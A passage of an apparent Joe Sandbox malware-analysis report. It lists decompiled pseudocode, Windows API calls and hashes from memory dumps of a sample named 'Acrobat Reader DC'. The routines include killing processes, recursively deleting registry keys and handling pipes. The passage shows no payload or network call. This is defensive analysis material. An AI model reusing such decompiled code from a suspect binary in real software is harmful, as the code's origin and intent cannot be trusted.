                                  • MapVirtualKeyW.USER32(00000011,00000000), ref: 00410B0E
                                  • MapVirtualKeyW.USER32(00000012,00000000), ref: 00410B16
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.286865083.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000A.00000002.286858320.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287083979.0000000000482000.00000002.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287562025.0000000000490000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287926837.0000000000491000.00000008.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287941418.0000000000492000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287967313.00000000004A7000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.288002325.00000000004AB000.00000002.00000001.01000000.00000009.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_10_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID: Virtual
                                  • String ID:
                                  • API String ID: 4278518827-0
                                  • Opcode ID: c23d3b718cf4e8061cd741903dec6eccba5b4b0418601ad509713896de31bf0c
                                  • Instruction ID: ec5b0e47a8727e2ef01e8325cfcf1e1c5a721ad9102a6d662b709b351e7b749c
                                  • Opcode Fuzzy Hash: c23d3b718cf4e8061cd741903dec6eccba5b4b0418601ad509713896de31bf0c
                                  • Instruction Fuzzy Hash: 79016770106B88ADD3309F668C84B47FFF8EF95704F01491DD1D507A52C6B5A84CCB69
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 100%
                                  			E0044B63B(intOrPtr _a4) {
                                  				void* _t6;
                                  				long _t8;
                                  				LONG* _t13;
                                  				intOrPtr _t17;
                                  				struct _CRITICAL_SECTION* _t18;
                                  				void** _t19;
                                  
                                  				_t17 = _a4;
                                  				_t19 = _t17 + 0x30;
                                  				if( *(_t17 + 0x30) != 0) {
                                  					_t13 = _t17 + 0x34;
                                  					_t8 = InterlockedExchange(_t13,  *(_t17 + 0x34));
                                  					if(_t8 != 0x1f6) {
                                  						_t18 = _t17 + 0x14;
                                  						EnterCriticalSection(_t18);
                                  						TerminateThread( *_t19, 0x1f6);
                                  						WaitForSingleObject( *_t19, 0x3e8);
                                  						E00432614(_t19);
                                  						_t8 = InterlockedExchange(_t13, 0x1f6);
                                  						LeaveCriticalSection(_t18);
                                  					}
                                  					return _t8;
                                  				}
                                  				return _t6;
                                  			}










                                  APIs
                                  • InterlockedExchange.KERNEL32(?,?), ref: 0044B655
                                  • EnterCriticalSection.KERNEL32(?), ref: 0044B666
                                  • TerminateThread.KERNEL32(?,000001F6), ref: 0044B674
                                  • WaitForSingleObject.KERNEL32(?,000003E8,?,000001F6), ref: 0044B682
                                    • Part of subcall function 00432614: CloseHandle.KERNEL32(00000000,00000000,?,0044B68E,00000000,?,000003E8,?,000001F6), ref: 00432622
                                  • InterlockedExchange.KERNEL32(?,000001F6), ref: 0044B697
                                  • LeaveCriticalSection.KERNEL32(?), ref: 0044B69E
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.286865083.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000A.00000002.286858320.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287083979.0000000000482000.00000002.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287562025.0000000000490000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287926837.0000000000491000.00000008.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287941418.0000000000492000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287967313.00000000004A7000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.288002325.00000000004AB000.00000002.00000001.01000000.00000009.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_10_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
                                  • String ID:
                                  • API String ID: 3495660284-0
                                  • Opcode ID: 80b6dccbd1e5d9cd8e45b8a26e63ab1859993381d971fdb3943588aa16a91346
                                  • Instruction ID: c0d5b59c8b9084ef0a5212f46b36de0b3fb5a8468090cd03c061fc2099eb7203
                                  • Opcode Fuzzy Hash: 80b6dccbd1e5d9cd8e45b8a26e63ab1859993381d971fdb3943588aa16a91346
                                  • Instruction Fuzzy Hash: A8F0AF72141201BBD210AB64EE8CDAFB77CFF88311F40092AFA0192560CBB4E420CBB6
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 100%
                                  			E00433FCE(struct HWND__* _a4) {
                                  				long _v8;
                                  				long _v12;
                                  				long _t7;
                                  				struct HWND__* _t14;
                                  				void* _t15;
                                  
                                  				_t14 = _a4;
                                  				PostMessageW(_t14, 0x10, 0, 0);
                                  				_t7 = SendMessageTimeoutW(_t14, 0x10, 0, 0, 2, 0x1f4,  &_v12);
                                  				if(_t7 == 0) {
                                  					GetWindowThreadProcessId(_t14,  &_v8);
                                  					_t15 = OpenProcess(0x1f0fff, 0, _v8);
                                  					TerminateProcess(_t15, 0);
                                  					return CloseHandle(_t15);
                                  				}
                                  				return _t7;
                                  			}









                                  APIs
                                  • PostMessageW.USER32(?,00000010,00000000,00000000), ref: 00433FDF
                                  • SendMessageTimeoutW.USER32 ref: 00433FF7
                                  • GetWindowThreadProcessId.USER32(?,?), ref: 00434006
                                  • OpenProcess.KERNEL32(001F0FFF,00000000,?), ref: 00434017
                                  • TerminateProcess.KERNEL32(00000000,00000000), ref: 00434022
                                  • CloseHandle.KERNEL32(00000000), ref: 00434029
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.286865083.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000A.00000002.286858320.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287083979.0000000000482000.00000002.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287562025.0000000000490000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287926837.0000000000491000.00000008.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287941418.0000000000492000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287967313.00000000004A7000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.288002325.00000000004AB000.00000002.00000001.01000000.00000009.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_10_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
                                  • String ID:
                                  • API String ID: 839392675-0
                                  • Opcode ID: 270ea397f99f845c81f96666f75a121d30ac61d95b76d5fc1fdfa9076574b2da
                                  • Instruction ID: 6d7c31bbfa6b3b8114dad7b7c2ee08b650c76bc0f6a005f10e60d9b42b3e3825
                                  • Opcode Fuzzy Hash: 270ea397f99f845c81f96666f75a121d30ac61d95b76d5fc1fdfa9076574b2da
                                  • Instruction Fuzzy Hash: 90F01D75681218BBE6215BA09D0AFEE776CAF09B01F104569FF01B61C1E7F42A0247AD
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 100%
                                  			E00432FEE() {
                                  				void* _t3;
                                  				void* _t9;
                                  				void* _t11;
                                  
                                  				_t9 = 0;
                                  				_t11 = OpenSCManagerW(0, 0, 8);
                                  				if(_t11 == 0) {
                                  					L6:
                                  					return _t9;
                                  				} else {
                                  					_t3 = LockServiceDatabase(_t11);
                                  					if(_t3 == 0) {
                                  						if(GetLastError() == 0x41f) {
                                  							_t9 = 1;
                                  						}
                                  						CloseServiceHandle(_t11);
                                  						goto L6;
                                  					} else {
                                  						UnlockServiceDatabase(_t3);
                                  						CloseServiceHandle(_t11);
                                  						return 1;
                                  					}
                                  				}
                                  			}







                                  APIs
                                  • OpenSCManagerW.ADVAPI32(00000000,00000000,00000008,004A90E8,14000000,0042E252), ref: 00432FF8
                                  • LockServiceDatabase.ADVAPI32(00000000), ref: 00433005
                                  • UnlockServiceDatabase.ADVAPI32(00000000), ref: 00433010
                                  • CloseServiceHandle.ADVAPI32(00000000), ref: 00433019
                                  • GetLastError.KERNEL32 ref: 00433024
                                  • CloseServiceHandle.ADVAPI32(00000000), ref: 00433034
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.286865083.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000A.00000002.286858320.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287083979.0000000000482000.00000002.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287562025.0000000000490000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287926837.0000000000491000.00000008.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287941418.0000000000492000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287967313.00000000004A7000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.288002325.00000000004AB000.00000002.00000001.01000000.00000009.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_10_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID: Service$CloseDatabaseHandle$ErrorLastLockManagerOpenUnlock
                                  • String ID:
                                  • API String ID: 1690418490-0
                                  • Opcode ID: 9e0ba4b1adc52d5e0b1b4f4059e6a78f5324ad2f54c459c37d760db65bd3d172
                                  • Instruction ID: 735ec6acd85acabf56193826cd071f2489ef818a13be6dc6b3d06c037ab4ab6a
                                  • Opcode Fuzzy Hash: 9e0ba4b1adc52d5e0b1b4f4059e6a78f5324ad2f54c459c37d760db65bd3d172
                                  • Instruction Fuzzy Hash: D5E065315822216BD6261B346E4DBCF37A8EB2F752F141827F701D6250CB998445D7A8
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 100%
                                  			E0045FA41(void* __ecx, void* __eflags, intOrPtr _a4) {
                                  				struct tagMENUITEMINFOW _v52;
                                  				struct HMENU__* _v56;
                                  				int _v60;
                                  				int _v64;
                                  				intOrPtr _v72;
                                  				int _t42;
                                  				signed int _t44;
                                  				void* _t50;
                                  				signed int _t55;
                                  				struct HMENU__* _t61;
                                  				int _t66;
                                  				signed int* _t68;
                                  				struct HMENU__** _t71;
                                  
                                  				_t50 = __ecx;
                                  				_v60 = 0xffffffff;
                                  				if(E00434179(__ecx, _a4,  &_v60) == 0) {
                                  					L18:
                                  					__eflags = 0;
                                  					return 0;
                                  				} else {
                                  					_t66 = _v60;
                                  					if(_t66 < 7 || _t66 >  *((intOrPtr*)(_t50 + 0x9d0))) {
                                  						goto L18;
                                  					} else {
                                  						_t71 =  *(_t50 + 0x1b4 + _t66 * 4);
                                  						if(_t71[1] != 1) {
                                  							L16:
                                  							if(DeleteMenu( *_t71, _t66, 0) == 0) {
                                  								goto L18;
                                  							} else {
                                  								 *_t71 = 0;
                                  								_t71[1] = 0xff;
                                  								E0040C600(_t33 | 0xffffffff,  &(_t71[2]), 0);
                                  								E0044422D(_t50, _t66);
                                  								return 1;
                                  							}
                                  						} else {
                                  							_v52.cbSize = 0x30;
                                  							E00412F40( &(_v52.fMask), 0, 0x2c);
                                  							_v52.fMask = 4;
                                  							if(GetMenuItemInfoW( *_t71, _t66, 0,  &_v52) == 0) {
                                  								goto L18;
                                  							} else {
                                  								_t61 = _v52.hSubMenu;
                                  								_t42 = 7;
                                  								_v56 = _t61;
                                  								_v64 = 7;
                                  								if( *((intOrPtr*)(_t50 + 0x9d0)) >= 7) {
                                  									_t18 = _t50 + 0x1d0; // 0x2cf
                                  									_t68 = _t18;
                                  									while(1) {
                                  										_t55 =  *_t68;
                                  										if(_t55 != 0 &&  *_t55 == _t61) {
                                  											_t87 =  *((char*)(_t55 + 4)) - 1;
                                  											if( *((char*)(_t55 + 4)) != 1) {
                                  												DeleteMenu(_t61, _t42, 0);
                                  												 *((char*)( *_t68 + 4)) = 0xff;
                                  												 *( *_t68) = 0;
                                  												_t44 =  *_t68;
                                  												 *((char*)(_t44 + 5)) = 0;
                                  												__eflags = _t44 | 0xffffffff;
                                  												E0040C600(_t44 | 0xffffffff,  *_t68 + 8, 0);
                                  												E0044422D(_t50, _v72);
                                  											} else {
                                  												E0045FA41(_t50, _t87, _t42);
                                  											}
                                  											_t42 = _v64;
                                  										}
                                  										_t42 = _t42 + 1;
                                  										_t68 =  &(_t68[1]);
                                  										_v64 = _t42;
                                  										if(_t42 >  *((intOrPtr*)(_t50 + 0x9d0))) {
                                  											break;
                                  										}
                                  										_t61 = _v56;
                                  									}
                                  									_t66 = _v60;
                                  								}
                                  								goto L16;
                                  							}
                                  						}
                                  					}
                                  				}
                                  			}

















                                  APIs
                                  • _memset.LIBCMT ref: 0045FAA9
                                  • GetMenuItemInfoW.USER32 ref: 0045FAC4
                                  • DeleteMenu.USER32(?,?,00000000), ref: 0045FB15
                                  • DeleteMenu.USER32(00000000,?,00000000), ref: 0045FB68
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.286865083.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000A.00000002.286858320.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287083979.0000000000482000.00000002.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287562025.0000000000490000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287926837.0000000000491000.00000008.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287941418.0000000000492000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287967313.00000000004A7000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.288002325.00000000004AB000.00000002.00000001.01000000.00000009.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_10_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID: Menu$Delete$InfoItem_memset
                                  • String ID: 0
                                  • API String ID: 1173514356-4108050209
                                  • Opcode ID: 44596b6c283006d3404d95c3e5e16104138b05286e513df4f299336d423ce3c8
                                  • Instruction ID: 2caf7e1b7ae413ca61a5456c92b2eab9e90ede26a48057f627e29f4096114103
                                  • Opcode Fuzzy Hash: 44596b6c283006d3404d95c3e5e16104138b05286e513df4f299336d423ce3c8
                                  • Instruction Fuzzy Hash: CC41D2B1604201ABD710CF25CC45F17B7A9AF84315F148A2EFDA49B2C2D378E849CBA6
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 100%
                                  			E00443442(signed int* _a4, signed int _a8, long _a12, void* _a16, HANDLE* _a20) {
                                  				struct _SECURITY_ATTRIBUTES _v16;
                                  				signed int _t17;
                                  				void* _t18;
                                  				void* _t20;
                                  				void* _t24;
                                  				void* _t27;
                                  				signed int _t28;
                                  				long _t30;
                                  				HANDLE* _t35;
                                  
                                  				_t17 =  *_a4;
                                  				_t30 = _a12;
                                  				_t35 = _a16;
                                  				_v16.nLength = 0xc;
                                  				_v16.bInheritHandle = 0;
                                  				_v16.lpSecurityDescriptor = 0;
                                  				if((_t17 & 0x00000010) == 0) {
                                  					if((_a8 & _t17) == 0) {
                                  						_t18 = GetStdHandle(_t30);
                                  						 *_t35 = _t18;
                                  						if(_t18 == 0 || _t18 == 0xffffffff) {
                                  							_t20 = CreateFileW("nul", 0x40000000, 2,  &_v16, 3, 0x80, 0);
                                  							 *_t35 = _t20;
                                  							if(_t20 == 0xffffffff || _t20 == 0) {
                                  								goto L3;
                                  							} else {
                                  								goto L10;
                                  							}
                                  						} else {
                                  							goto L2;
                                  						}
                                  					} else {
                                  						_t27 =  *_t35;
                                  						if(_t27 == 0) {
                                  							_t28 = CreatePipe(_a20, _t35,  &_v16, 0);
                                  							if(_t28 != 0) {
                                  								L10:
                                  								E004325E0( *_t35,  &_a16, 1);
                                  								E00432614(_t35);
                                  								_t24 = _a16;
                                  								 *_t35 = _t24;
                                  								return _t24;
                                  							} else {
                                  								return _t28 | 0xffffffff;
                                  							}
                                  						} else {
                                  							return _t27;
                                  						}
                                  					}
                                  				} else {
                                  					_t18 = GetStdHandle(_t30);
                                  					 *_t35 = _t18;
                                  					if(_t18 == 0xffffffff) {
                                  						L3:
                                  						 *_t35 = 0;
                                  						return  *_t35;
                                  					} else {
                                  						L2:
                                  						E004325E0(_t18, _t35, 1);
                                  						return  *_t35;
                                  					}
                                  				}
                                  			}













                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.286865083.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000A.00000002.286858320.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287083979.0000000000482000.00000002.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287562025.0000000000490000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287926837.0000000000491000.00000008.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287941418.0000000000492000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287967313.00000000004A7000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.288002325.00000000004AB000.00000002.00000001.01000000.00000009.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_10_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID: Handle
                                  • String ID: nul
                                  • API String ID: 2519475695-2873401336
                                  • Opcode ID: efdaae6ab43bf4356d88622121a7e42c7f624cc6de1d12637521731ec53ca4c5
                                  • Instruction ID: 058e2060cb23de8d889deff533ab301820a4ae088d702658d54b05e79d5a48de
                                  • Opcode Fuzzy Hash: efdaae6ab43bf4356d88622121a7e42c7f624cc6de1d12637521731ec53ca4c5
                                  • Instruction Fuzzy Hash: 84319571500204ABEB20DF68DC46BEB77A8EF04721F104A4EFD50973D1E7B59A50CBA5
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 100%
                                  			E0044334F(signed char* _a4, void* _a8, HANDLE* _a12) {
                                  				struct _SECURITY_ATTRIBUTES _v16;
                                  				signed char _t15;
                                  				void* _t16;
                                  				void* _t18;
                                  				void* _t22;
                                  				void* _t25;
                                  				signed int _t26;
                                  				HANDLE* _t32;
                                  
                                  				_t15 =  *_a4;
                                  				_t32 = _a8;
                                  				_v16.nLength = 0xc;
                                  				_v16.bInheritHandle = 0;
                                  				_v16.lpSecurityDescriptor = 0;
                                  				if((_t15 & 0x00000010) == 0) {
                                  					if((_t15 & 0x00000001) == 0) {
                                  						_t16 = GetStdHandle(0xfffffff6);
                                  						 *_t32 = _t16;
                                  						if(_t16 == 0 || _t16 == 0xffffffff) {
                                  							_t18 = CreateFileW("nul", 0x80000000, 1,  &_v16, 3, 0x80, 0);
                                  							 *_t32 = _t18;
                                  							if(_t18 == 0xffffffff || _t18 == 0) {
                                  								goto L3;
                                  							} else {
                                  								goto L10;
                                  							}
                                  						} else {
                                  							goto L2;
                                  						}
                                  					} else {
                                  						_t25 =  *_t32;
                                  						if(_t25 == 0) {
                                  							_t26 = CreatePipe(_t32, _a12,  &_v16, 0);
                                  							if(_t26 != 0) {
                                  								L10:
                                  								E004325E0( *_t32,  &_a8, 1);
                                  								E00432614(_t32);
                                  								_t22 = _a8;
                                  								 *_t32 = _t22;
                                  								return _t22;
                                  							} else {
                                  								return _t26 | 0xffffffff;
                                  							}
                                  						} else {
                                  							return _t25;
                                  						}
                                  					}
                                  				} else {
                                  					_t16 = GetStdHandle(0xfffffff6);
                                  					 *_t32 = _t16;
                                  					if(_t16 == 0xffffffff) {
                                  						L3:
                                  						 *_t32 = 0;
                                  						return  *_t32;
                                  					} else {
                                  						L2:
                                  						E004325E0(_t16, _t32, 1);
                                  						return  *_t32;
                                  					}
                                  				}
                                  			}












                                  APIs
                                  • GetStdHandle.KERNEL32(000000F6), ref: 0044337D
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.286865083.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000A.00000002.286858320.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287083979.0000000000482000.00000002.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287562025.0000000000490000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287926837.0000000000491000.00000008.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287941418.0000000000492000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287967313.00000000004A7000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.288002325.00000000004AB000.00000002.00000001.01000000.00000009.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_10_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID: Handle
                                  • String ID: nul
                                  • API String ID: 2519475695-2873401336
                                  • Opcode ID: 97b946d9a765a46b1e85699804a5cf49c651f34dfecb3a2317456e71fe30ed78
                                  • Instruction ID: 7fb8f1e98e57093f7bc771e71f756598ee5282d4f5ffeaa4ddc08f3ab3272662
                                  • Opcode Fuzzy Hash: 97b946d9a765a46b1e85699804a5cf49c651f34dfecb3a2317456e71fe30ed78
                                  • Instruction Fuzzy Hash: 05219331600204ABE720DF689C49FAB77A8EF55731F20474EFDA0972D0EBB59A50C795
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 100%
                                  			E00440C49(intOrPtr _a4, struct HWND__** _a8, intOrPtr _a12, WCHAR* _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32, signed int _a36, long _a40) {
                                  				signed int _t13;
                                  				struct HWND__* _t16;
                                  				int _t20;
                                  				WCHAR* _t24;
                                  				intOrPtr _t25;
                                  				intOrPtr _t29;
                                  				struct HWND__** _t37;
                                  
                                  				_t13 = _a36;
                                  				_t29 = _a32;
                                  				_t25 = _a28;
                                  				_t24 = _a16;
                                  				_t37 = _a8;
                                  				if(_t13 != 0xffffffff) {
                                  					if(_t13 < 0x10) {
                                  						goto L13;
                                  					}
                                  				} else {
                                  					_t13 = 2;
                                  					L13:
                                  					_t13 = _t13 | 0x00000002;
                                  				}
                                  				if(_t25 == 0xffffffff) {
                                  					_t25 = 0x96;
                                  				}
                                  				if(_t29 == 0xffffffff) {
                                  					_t29 = 0x96;
                                  				}
                                  				if(_a40 >= 0) {
                                  					if( *_t24 == 0) {
                                  						goto L19;
                                  					} else {
                                  						_t16 = E004301F8(_a4, 0, L"SysAnimate32", 0, _t13, _a20, _a24, _t25, _t29, _a12, 0);
                                  						 *_t37 = _t16;
                                  						if(_t16 == 0) {
                                  							L8:
                                  							return 0;
                                  						} else {
                                  							if(SendMessageW(_t16, 0x467, 0, _t24) != 0) {
                                  								L9:
                                  								if( *0x4a8638 == 0) {
                                  									_t37[0x1f] = 0x300;
                                  								}
                                  								return 1;
                                  							} else {
                                  								_t20 = LoadLibraryW(_t24);
                                  								if(_t20 == 0 || SendMessageW( *_t37, 0x467, _t20, _a40) != 0) {
                                  									goto L9;
                                  								} else {
                                  									DestroyWindow( *_t37);
                                  									goto L8;
                                  								}
                                  							}
                                  						}
                                  					}
                                  				} else {
                                  					L19:
                                  					return 0;
                                  				}
                                  			}











                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.286865083.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000A.00000002.286858320.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287083979.0000000000482000.00000002.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287562025.0000000000490000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287926837.0000000000491000.00000008.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287941418.0000000000492000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287967313.00000000004A7000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.288002325.00000000004AB000.00000002.00000001.01000000.00000009.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_10_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: SysAnimate32
                                  • API String ID: 0-1011021900
                                  • Opcode ID: 8caf53187f6e77aecacb49307b2e697766faa1bc511b1160dce697a174d3407c
                                  • Instruction ID: b1a10ecfd0a3fc3d2af2854cd73c9de1262d8b9fd4b2252518a975ef6c54cff1
                                  • Opcode Fuzzy Hash: 8caf53187f6e77aecacb49307b2e697766faa1bc511b1160dce697a174d3407c
                                  • Instruction Fuzzy Hash: 0D21C975600205ABFB149EA9EC81FAB73DCEB95324F20471BF711972C0D279EC518768
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 86%
                                  			E00441C7B(void* _a4, signed int _a8) {
                                  				int _v8;
                                  				void* _v12;
                                  				int _v16;
                                  				int _v20;
                                  				char _v28;
                                  				struct _FILETIME _v36;
                                  				short _v548;
                                  				int _t29;
                                  				void* _t33;
                                  				void* _t35;
                                  				long _t36;
                                  				signed int _t57;
                                  				void* _t58;
                                  				void* _t59;
                                  
                                  				_t58 = _a4;
                                  				_v8 = 0xff;
                                  				if(RegEnumKeyExW(_t58, 0,  &_v548,  &_v8, 0, 0, 0,  &_v36) == 0x103) {
                                  					L10:
                                  					return 1;
                                  				} else {
                                  					_t57 = _a8;
                                  					_t29 = _t57 | 0x00020019;
                                  					_v16 = _t29;
                                  					while(RegOpenKeyExW(_t58,  &_v548, 0, _t29,  &_v12) == 0) {
                                  						_t33 = E00441C7B(_v12, _t57);
                                  						_t59 = _t59 + 8;
                                  						RegCloseKey(_v12);
                                  						if(_t33 == 0) {
                                  							break;
                                  						} else {
                                  							_v28 = 0;
                                  							_v20 = 0;
                                  							_t35 = E00430CB1( &_v28);
                                  							_t63 = _t35;
                                  							if(_t35 == 0) {
                                  								_t36 = RegDeleteKeyW(_t58,  &_v548);
                                  							} else {
                                  								_push(0);
                                  								_push(_t57);
                                  								_push( &_v548);
                                  								_push(_t58);
                                  								_t36 =  *((intOrPtr*)(E00441C58(_t63,  &_v28)))();
                                  							}
                                  							if(_t36 != 0) {
                                  								E00430CCB( &_v28);
                                  								break;
                                  							} else {
                                  								E00430CCB( &_v28);
                                  								_v8 = 0xff;
                                  								if(RegEnumKeyExW(_t58, 0,  &_v548,  &_v8, 0, 0, 0,  &_v36) != 0x103) {
                                  									_t29 = _v16;
                                  									continue;
                                  								} else {
                                  									goto L10;
                                  								}
                                  							}
                                  						}
                                  						goto L13;
                                  					}
                                  					__eflags = 0;
                                  					return 0;
                                  				}
                                  				L13:
                                  			}


















                                  APIs
                                  • RegEnumKeyExW.ADVAPI32 ref: 00441CA9
                                  • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00441CDD
                                  • RegCloseKey.ADVAPI32(?), ref: 00441CFE
                                  • RegDeleteKeyW.ADVAPI32(?,?), ref: 00441D40
                                  • RegEnumKeyExW.ADVAPI32 ref: 00441D6E
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.286865083.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000A.00000002.286858320.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287083979.0000000000482000.00000002.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287562025.0000000000490000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287926837.0000000000491000.00000008.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287941418.0000000000492000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287967313.00000000004A7000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.288002325.00000000004AB000.00000002.00000001.01000000.00000009.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_10_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID: Enum$CloseDeleteOpen
                                  • String ID:
                                  • API String ID: 2095303065-0
                                  • Opcode ID: d2ce045a3c5b7a9f88abc7d1956311aab30076c6419bcb4202e5cbde6d6cad15
                                  • Instruction ID: 7ca4c7ada97503ad9332fce322fe5d5fc03c2789ff93db080e75f28165cdf273
                                  • Opcode Fuzzy Hash: d2ce045a3c5b7a9f88abc7d1956311aab30076c6419bcb4202e5cbde6d6cad15
                                  • Instruction Fuzzy Hash: 69317CB2940108BAEB10DBD4DC85FFEB77CEB49304F04456EF605A7241D774AA858BA8
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 66%
